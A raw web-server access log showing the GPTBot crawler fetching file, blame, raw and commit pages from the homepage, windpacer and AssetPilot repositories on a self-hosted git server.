"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup" -[17/Feb/2026:14:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" [Client 74.7.227.38] [Length 11041] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" -[17/Feb/2026:14:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" [Client 74.7.227.38] [Length 12769] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" -[17/Feb/2026:14:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10681] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10992] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 148058] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10170] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" -[17/Feb/2026:14:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:14:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10331] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" -[17/Feb/2026:14:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" [Client 74.7.227.38] [Length 10793] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" -[17/Feb/2026:14:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 9923] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx-reverse-proxy.conf" -[17/Feb/2026:14:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" -[17/Feb/2026:14:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" [Client 74.7.227.38] [Length 9965] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" -[17/Feb/2026:14:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" -[17/Feb/2026:14:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" -[17/Feb/2026:14:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" [Client 74.7.227.38] [Length 11800] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" -[17/Feb/2026:14:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" [Client 74.7.227.38] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" -[17/Feb/2026:14:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:14:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:14:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" [Client 74.7.227.38] [Length 11705] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:14:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23925] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" -[17/Feb/2026:14:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10514] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" -[17/Feb/2026:14:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" [Client 74.7.227.38] [Length 10710] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" -[17/Feb/2026:14:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 13294] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:14:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs" [Client 74.7.227.38] [Length 115951] [Gzip 15.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:14:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 288809] [Gzip 12.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main" -[17/Feb/2026:14:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10720] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" -[17/Feb/2026:14:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html%2fassets" [Client 74.7.227.38] [Length 18593] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:14:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" -[17/Feb/2026:14:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" [Client 74.7.227.38] [Length 10982] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" -[17/Feb/2026:14:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" -[17/Feb/2026:14:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71398] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp2.md" -[17/Feb/2026:14:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" -[17/Feb/2026:14:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11672] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" -[17/Feb/2026:14:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" -[17/Feb/2026:14:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm" -[17/Feb/2026:14:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10162] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" -[17/Feb/2026:14:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 15789] [Gzip 9.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" -[17/Feb/2026:14:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" -[17/Feb/2026:14:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/my_database.db" -[17/Feb/2026:14:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10398] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm" -[17/Feb/2026:14:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11105] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject" -[17/Feb/2026:14:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json" -[17/Feb/2026:14:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" -[17/Feb/2026:14:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10770] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 10836] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" -[17/Feb/2026:14:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] 